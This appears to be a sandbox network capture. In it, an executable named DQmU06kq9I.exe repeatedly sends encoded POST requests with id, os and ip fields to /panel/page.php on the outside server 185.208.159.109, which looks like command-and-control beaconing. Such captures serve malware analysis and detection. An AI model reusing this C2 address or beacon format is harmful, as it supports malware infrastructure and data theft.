                                        Dec 17, 2024 10:23:31.987653017 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:32.107350111 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:32.917309046 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:32.971951962 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:33.153312922 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:33.206336021 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:38.025374889 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:38.025440931 CET4999680192.168.2.5185.208.159.109
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Dec 17, 2024 10:23:20.034152985 CET | 1.1.1.1 | 192.168.2.5 | 0x3714 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                        Dec 17, 2024 10:23:20.034152985 CET | 1.1.1.1 | 192.168.2.5 | 0x3714 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                        • 185.208.159.109
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:20:17.778166056 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:20:18.128650904 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:20:19.057401896 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:20:19.292892933 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:20:18 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:20:35.577512026 CET | 194 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Dec 17, 2024 10:20:35.925260067 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:20:36.861203909 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:20:37.096514940 CET | 147 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:20:36 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:20:55.126995087 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:20:55.472043037 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:20:56.405700922 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:20:56.644464970 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:20:56 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:12.296504021 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:21:12.644069910 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:13.574693918 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:13.808129072 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:13 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | 2680 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:28.354572058 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:21:28.706501961 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:29.632493019 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:29.868261099 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:29 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:31.202579975 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:21:31.550246000 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:32.484730959 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:32.720211029 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:32 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | 2680 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:36.853759050 CET | 194 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Dec 17, 2024 10:21:37.207747936 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:38.012603998 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:38.252089024 CET | 147 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:37 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:43.390369892 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:21:43.738125086 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:44.676506996 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:44.912226915 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:44 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | 2680 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:54.015923977 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:21:54.362643003 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:55.292049885 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:55.524868965 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:55 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:21:55.686429977 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:21:56.034478903 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:21:56.966278076 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:21:57.204272032 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:21:56 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | 5440 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:11.312266111 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:11.660044909 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:12.590095997 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:12.824393988 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:12 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | 2680 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:13.875257969 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:14.222560883 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:15.152443886 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:15.389276028 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:14 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | 2680 | C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:29.250087976 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:29.597039938 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:30.530515909 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:30.764267921 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:30 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        13 | 192.168.2.5 | 49988 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:30.108968019 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:30.456639051 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:31.387343884 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:31.620615005 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:31 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        14 | 192.168.2.5 | 49989 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:35.989118099 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:36.347067118 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:37.269721031 CET | 25 | IN | HTTP/1.1 100 Continue
